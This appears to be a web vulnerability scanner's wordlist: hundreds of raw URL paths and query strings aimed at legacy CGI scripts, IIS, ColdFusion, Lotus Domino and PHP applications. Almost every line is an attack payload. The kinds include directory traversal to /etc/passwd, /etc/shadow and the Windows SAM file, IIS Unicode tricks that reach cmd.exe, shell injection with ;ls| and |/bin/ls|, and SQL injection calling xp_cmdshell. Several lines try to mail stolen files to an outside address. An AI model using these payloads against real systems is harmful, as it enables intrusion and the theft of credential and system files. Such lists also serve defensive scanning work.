/iisadmin/ism.dll%3fhttp/dir
/sbin/nscgi.cfg
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/textcounter.pl
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cfbin/board.cgi
/*.shtml/
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/index.js%2570
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cfdocs/expeval/eval.cfm
/servlet/FormMailServlet?juhu.txt
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/index.JSP
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/file/main.shtml
/adcycle/AdLogin.pm
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/WebDB/admin_/
/cgi-bin/wguest.exe
/cfdocs/snippets/evaluate.cfm
/....../
/..\..\..\winnt\repair\sam._
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/webmacro/Page?db=tst&wmtemplate=ttt
/servlet/SessionServlet
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/traceroute.cgi
/dms/AggreSpy
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/webadmin.ntf
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/cgiwrap
/ezboard/ezman.cgi
/cgi-bin/web2mail.cgi
:901
:4096/../../../winnt/repair/sam._
/test.php3
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/statsconfig.pl
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_users
/scripts/foo.cmd?xxx&dir
/cgi-bin/ftpdiag.cgi
:3000/../../hosts
/cgi-bin/MailPost.exe
/cgi-bin/phpinfo.php3
/cgi-bin/core
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/postie.cgi
/\.../
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/iisadmpwd/aexp4b.htr
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
:8888/ab2/@Ab2Admin
/cgi/
/stronghold-status
/include/config.inc
/scripts/samples/details.idc
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/file/index.jsp
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/internal/
/.nsf/../lotus/domino/notes.ini
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/%3f.jsp
:10000/net/
/cgi-bin/futureforum3.cgi
/cgi-bin/empower?DB=mungowitsch
/scripts/emurl/RECMAN.dll?
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/flexform.cgi
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/globals.pl
/example.jsp%81
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/Globals.jsa
/cfdocs/expeval/displayopenedfile.cfm
/cgi-bin/mailnews.cgi
/scripts/dbman/db.cgi?db=tedb
/globals.jsa
:9090//etc/shadow
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
:2301
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/file/main.jsp
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/ads/admin.cgi
/servlet/test/pathInfo/test
/_vti_bin/fpcount.exe
/*.jsp/
/index.php?file=http://xxx&fcmd=ls
/config/
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/cgi-bin/AT-admin.cgi
/_vti_log/author.log
/iissamples/issamples/oop/qsumrhit.htw
/scripts/cgimail.exe
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/hwtestio
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/./admin/
/suche%3f
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/post32.exe
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/forum/forumdisplay.php?s=&forumid=
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/oetaki/oekakibbs.conf
:2301/Proxy/LoginResponse
/_vti_bin/shtml.dll/tstt.htm
/components/AspUpload/Samples/Test11.asp
:8080/%252e%252e/%252e%252e/%00.jsp
/basilix/basilix.php?username=blah;ls
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/scripts/mail.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
/cgi-bin/download.pl?s=path&c=txt&f=fn
/cgi-bin/jj
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/cgi-bin/paramtool
/cgi-bin/formvar.exe
/cgi-bin/cvsweb.cgi
/ows-bin/owa/owa%5futil%2esignature
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/post-query?
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/manage/cgi/cgiproc?Nocfile=
/forums/list.php
/cgi-bin/dcguest.cgi
/inc/sendmail.inc
/index.php%20%20
/_vti_bin/_vti_aut/dvwssr.dll
/cgi-bin/debug.cgi
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/ez2000/ezman.cgi
/index.php3?vhosts=http://go.to
/cgi-bin/query%3f
/search97/s97_cgi.exe
/ccbill/
/cgi-bin/lb5000/search.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/imagemap.exe
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/cgi-bin/getdoc.cgi
/iisadmpwd/anot.htr
/global.asa\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/mailmepro.exe
/scripts/toos/mkilog.exe
/webadmin.nsf
/cgi-bin/htsearch?exclude=%60%60
/PDG_Cart/shopper.conf
/servlet/ssifilter/../../test.jsp
/eg/source.asp
/cfdocs/snippets/viewexample.cfm?Tagname=
:8010//
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/piranha/secure/passwd.php3?username=piranha&passwd=q
/isapi/tstisapi.dll
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/CFDOCS/exampleapps/
/cgi-bin/webgais
/cgi-bin/ssi/cgi-bin/ssi
/ppwb/Temp/
/cgi-bin/bnbform.pl
/web.config
/scripts/postie.exe
/cgi-bin/whois.cgi
/cgi-bin/bb-hostsvc.sh
:8888/cgi-bin/admin/admin
/admin-serv/config/admpw
/%2ehtaccess
/scripts/repost.asp
/../scandisk.log
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/cgi-bin/bb-histlog.sh
/cgi-bin/ws_mail.cgi?kill=ng
/4DBin/_/C:/winnt/repair/sam._
/../../winnt/win.ini%00examples/jsp/hello.jsp
/cgi-bin/classifieds.cgi
/4DBin/_/../boot.ini
/components/AspUpload/Samples/DirectoryListing.asp
/cgi-bin/disk2server.cgi
/pls/demo/owa_util.showsource?cname=owa_util
/cgi-bin/allmanage.pl
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/basilix/basilix.php3?username=blah;ls
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/story.cgi?next=
/cgi-local/
/cgi-bin/bb-replog.sh
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
/include/sql.php
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/secret/index.htm
/cgi-bin/powerup/r.cgi?FILE=main.html
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/inc/db.inc
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/cgi-bin/maillist.pl
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/servlet/viewsource.jsp
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/cgi-bin/script.bat%3f&dir
/cgi-bin/ezmlm-cgi
/cgi-bin/aliredir.exe
/config.inc
/cgi-bin/guestadd.pl
/servlet/psoft.hsphere.CP
/inc/test.php
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/cgi-bin/nph-maillist.pl
/quikstore.cfg
/cgi-bin/w3-msql/index.html
/cgi-bin/websendmail
/cgi-bin/simple
/wwwboard/wwwboard.pl
:800/../..\
/_pages/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/cgi-bin/db2www/../../db2www.ini
/cgi-bin/man.sh
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/stronghold-info
/SiteServer/Admin/knowledge/dsmgr/default.asp
/./WEB-INF/web.xml
/cgi-bin/aglimpse
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/servlet//..//../o.jsp
/guestbook/dcguest.cgi
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi
/cgi-bin/excite
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/forum-admin.pl
/cgi-bin/input2.bat
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/test-cgi
/iissamples/exair/search/qfullhit.htw
/servlet/DMSDump
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/cgi-bin/csvform.pl?file=/bin/ls%00|
/example%2ejsp
/servlet/ServletManager?username=servlet&password=manager
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
/pservlet.html
/cgi-bin/lastlines.cgi
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/clickresponder.pl
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/demo/basic/info/info.jsp
/cgi-bin/finger
/cd/../config/html/cnf_gi.htm
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=x
/Admin_files/order.log
/cgi-bin
/site/eg/source.asp
/cgi-bin/finger.cgi
/cgi-bin/webdriver
/ping
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/viewsource.jsp
/cgi-bin/debug.pl
/cgi-bin/abuse.man?file=&domain=&script=
/cgi-bin/infogate
/index.php3.%5c../..%5cconf/httpd.conf
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/test.jsp../
/global.asa
/webres/discuss/passwd.txt
/../../../../config.sys
:8100//WEB-INF/webapp.properties
/demo/basic/info/info.jsp
/cgi-bin/auction/auction.pl?action=tst
/scripts/bigconf.cgi
/scripts/mailform.exe
/cgi-bin/cachemgr.cgi
/ez2000/ezboard.cgi
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/SiteServer/Admin/commerce/foundation/DSN.asp
/opendir.php?requesturl=/etc/hosts
/include/sql.inc
:631/admin/?op=%c0
/cgi-bin/PGPMail.pl
/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3 D'hoschi'%23
/cgi-bin/loadpage.cgi
/cgi-bin/forma
/cgi-bin/mailto.cgi
/ezboard/ezboard.cgi
/mailman/edithtml
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
/dms/DMSDump
/admin/
/mall_log_files/order.log
/cgi-bin/stats.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/lsindex2.bat
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/private/
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/priv/
/cgi-bin/source.asp
/xsql/java/demo/
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/test.txt;%20/bin/ls
/WebSTAR%20LOG
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/.dS_store
/webstar.log
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cgi-bin/whois_raw.cgi
/cgi-bin/FormMail.cgi
/../../shadow
:8003/Display
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/inc/sql.inc
/global.asa%3f.jsp
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/carbo.dll
/cgi-bin/store/agora.cgi?page=hoschi.html
/cgi-bin/test.bat
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
/discuss/passwd.txt
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/pls/demo/%08owa_util.signature
/example.jsp../
/&@#&@#&@#&@#&@#&@#&@#.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/shtml/
/ChipCfg
/index.jsp::$DATA
/test.jsp..
/cgi-bin/postie.exe
/cgi-bin/htmlscript
/pls/demo/owa_util.showsource?cname=owa_util
/images/tmp.txt
/%2eHTACCESS
/store/temp_customers/
/ezboard/ezadmin.cgi
/*.jhtml/
:80/../../../autoexec.bat
/cgi-bin/upload.cgi
/pccsmysqladm/incs/dbconnect.inc
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/*.shtml/login.jsp
/iisadmpwd/aexp2.htr
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
/main.asp+.htr
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/phprocketaddin/?page=../../../../../../../etc/hosts
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/fpexplore.exe
/db.inc
/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/scripts
/ifx/?LO=../../../../../../../../../etc/hosts
/cgi-bin/webgais
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/iisadmpwd/aexp4.htr
/orders/orders.txt
/index.jsp../
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/info/
/_AuthChangeUrl
/iissamples/
/cgi-bin/webboard/generate.cgi?&@#&@#&@#&@#&@#&@#&@#=../../../../../../../../../etc/hosts%00&board=tst
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/board.cgi
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/cgi-bin/htimage.exe
/dms0
/global.asax
/scripts/samples/ctguestb.idc
/iisadmpwd/
/./WEB-INF/
/pw/storemgr.pw
/includes/
/class/mysql.class
/search/s97_cgi.exe
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/cgi-bin/cart32.exe/expdate
/cgi-bin/mailsend.exe
/ext.dll%00
/cgi-bin/build.cgi
/forums/forumdisplay.php?s=&forumid=
/_vti_pvt
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/shtml.exe
/cgi-bin/cgitest.exe
/Administration/
/siteserver/publishing/viewcode.asp?source=/tata.asp
:8080/anything.jsp
/cgi-bin/formhandler.cgi
/SiteServer/Admin/commerce/foundation/driver.asp
/.../
/cfdocs/snippets/setlocale.cfm
/AdvWorks/equipment/catalog_type.asp
/cgi-bin/bnbform
/submit.php
/_mem_bin/remind.asp
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/cgi-bin/imapcern.exe
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/webplus?script=
/cgi-bin/Count.cgi
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/wais.pl
/cgi-bin/environ.pl
:30001/../../template/shared/indexTemplate.xml
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/cgi-bin/Ultimate.cgi
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:3128/../../../conf/Eserv.ini
/cgi-bin/filemail.pl
/cgi-bin/printenv
/cgi-bin/faxsurvey
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
:8000/./WEB-INF/
/perl
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/cgi-bin/commander.pl
/passcfg
/join.cfm
/cgi-sys/PGPMail.pl
/demo/email/sendmail.jsp
/test%2ejsp
/SiteServer/Admin/commerce/foundation/domain.asp
/cgi-bin/tst.bat
/2600-cgi/ezmlm-cgi
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/perl
/cgi-bin/wwwadmin.cgi
/cgi-bin/webdist.cgi
:9090/board.html
/cfdocs/exampleapp/publish/admin/add&@#&@#&@#&@#&@#&@#&@#.cfm
/cgi-bin/textcounter.pl
/cgi-bin/campas
:444/..\..\..\..\..\autoexec.bat
/demo/email/sendmail.jsp
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/dcguest/dcguest.cgi
/cgi-dos/args.bat
/scripts/texis.exe/ngohos
/scripts/test.bat
/*.jsp::$DATA/
/cgi-dos/foo.cmd?xxx&dir
/hypermail
/cgi-bin/view-source
/cgi-bin/tst2.bat
/netget?sid=user&msg=300&file=/../../../filename.ext
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/+./
/cgi-bin/AnyForm2
:801/../../../../../../../../etc/hosts
/cgi-bin/scripts/cart.pl?env
/minivend/catalog.cfg
/dbconfig.inc
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/cgi-bin/boozt/admin/index.cgi
/cgi-bin/search.pl?form=search.pl%00
/cfdocs/exampleapp/email/getfile.cfm
/cgi-shl
/iisadmpwd/aexp.htr
:8002/Newuser?Image=../../database/rbsserv.mdb
/cgi-bin/responder.cgi
/scripts/files.pl
/~test/
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/servlet/jsp/../../tst.txt
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/cgi-bin/whois.cgi
/cgi-bin/blat.exe
/Secure/Local/console/cmhome.htm
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/rguest.exe
/cgi-bin/unlg1.1
/AdLogin.pm
/interscan/cgi-bin/FtpSave.dll?I'm%20here
:8000/cgi/wja?page=wja
/..../
:8100//WEB-INF/
/cgi-bin/dumpenv.pl
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin-sdb/
/cgi-bin/process_bug.cgi
/pass?loginpass=a&redirect=0%2F&Submit=Login
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/index%2ejsp
/.ns4/../winnt/win.ini
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/cgi-bin/post16.exe
/cgi-bin/environ.cgi
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/ext.dll
/admin.php3?admin=whatever
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"&@#&@#&@#&@#&@#&@#&@#-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/cgi-bin/admin.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/test.pl
/cgi-bin/mailform.cgi
/cgi-bin/echo2
:9090/examples/applications/bboard/bboard_frames.html
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/echo.bat
/soap/servlet/Spy
/cfdocs/snippets/fileexists.cfm
/events4.nsf
/scripts/blat.exe
/Admin/knowledge/dsmgr/users/GroupManager.asp
/scripts/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/iisadmpwd/aexp3.htr
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/orders/mountain.cfg
/cgi-bin/texis/hoschiboschi
/cgi-bin/bb-rep.sh
/~root/
/ad.cgi?file=../../../../../../../../etc/hosts
/cgiWebupdate.exe
/a%5c.aspx
/oprocmgr-service
/iissamples/sdk/asp/docs/codebrws.asp
/msadc/msadcs.dll
/cgi-bin/www-sql
:8888/admin.cgi
/cgi-bin/ppdscgi.exe
/scripts/MailPost.exe
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cfdocs/expeval/sendmail.cfm
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/admin/includes/
/search/iaquery.exe%3f
:5000/
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/pls/admin_/help/..%255Cplsql.conf
/cgi-bin/test.cgi
/~named/
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/.www.my.cnf
/cgi-bin/test.php3
/ez2000/ezadmin.cgi
/cgi/cvsweb.cgi
/cgi-bin/forum.pl
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/default.asp%3f.htr
/servlet/Spy
/applist.asp
/phpBB/bb_memberlist.php?sortby=user_regdate
/include/
/cgi-bin/ping.cgi
/_private/form_results.txt
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/..../
/file/main.jhtml
/cgi-bin/foo.cmd?xxx&dir
/global.asa%3f.htr
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/cgi-bin/mailme.exe
/bigconf.cgi
/cgi-bin/cookmail/cookmail.exe
/scripts/c32web.exe/ChangeAdminPassword
/~tmp/
/cgi-bin/get32.exe
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/cgi-bin/mail.cgi
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/cpmdaemon.cgi
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/file/index.shtml
/cgi-bin/test.exe
/_mem_bin/auoconfig.asp
/cgi-bin/web2mail.cgi
/cfdocs/cfmlsyntaxcheck.cfm
/default.asp+.htr
/cgi-bin/DCShop/Orders/orders.txt
/ssi/envout.bat
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/index.JHTML
/merchants/admin.pw
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/calender.pl
/https-admserv/config/admpw
/cgi-bin/wrap
/modules.php?name=Members_List&&sql_debug=1
/cgi-bin/admin.cgi
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/examples/jsp/snp/anything.snp
/......autoexec.bat
/cgi-bin/showfile
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/~/
/publisher/
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/cgi-bin/bigconf.cgi
/AdSamples/config/site.csc
/cgi-bin/mailform.pl
/foldoc/template.cgi?template.cgi
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/add_ftp.cgi
/..../scandisk.log
/cgi-bin/cgimail.exe
:9000/cgi-bin/query%3f
/Test11.asp
/ows-bin/owa/owa%5futil%2eshowsource
/%00/
/cgi-bin/ads.cgi
:8000/file/%2E%2E/test1.mp3
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/admin/
/administration/
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/scripts/convert.bas
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/~guest/
/cgi-bin/console.exe?page_size=
/fcgi-bin/echo
/4DBin/_/C:/inetpub/../boot.ini
/store/customers/
/cgi-bin/getcomments.pl
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('/bin/ls')."
/cgi-bin/forums/dcboard.cgi
/.www.my.cnf
/~nobody/
/cgi-bin/cwmail.ini
/iisadmpwd/anot3.htr
:8010/
/+/
/interscan/cgi-bin/FtpSave.dll?yes
/scripts/tools/getdrvrs.exe
/samples/Search/queryhit.htm
/inc/
/jsp/source.jsp
//WEB-INF/webapp.properties
/servlet/SurveyXMLServlet?jeaaa.txt
/cgi-bin/bnbform.cgi
/cgi-bin/w3mail/login.cgi
:8080/../examples//WEB-INF/../../../../../
/.jsp/WEB-INF/classes/Env.java
:800/C:/
/cgi-bin/info2www
/cgi-win/
/_vti_inf.html
/4DBin/_/../inetpub/../boot.ini
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/global.asa::$DATA
/cgi-bin/wwwthreads/changedisplay.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/dcboard.cgi
/cgi-bin/netauth.cgi?cmd=show&page=../../
/chip.ini
/manual.php
/scripts/*.pl
/ubb/register.php
/cgi-bin/postings.cgi
/anything.jsp
/.HTACCESS.
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/cgi-bin/imapncsa.exe
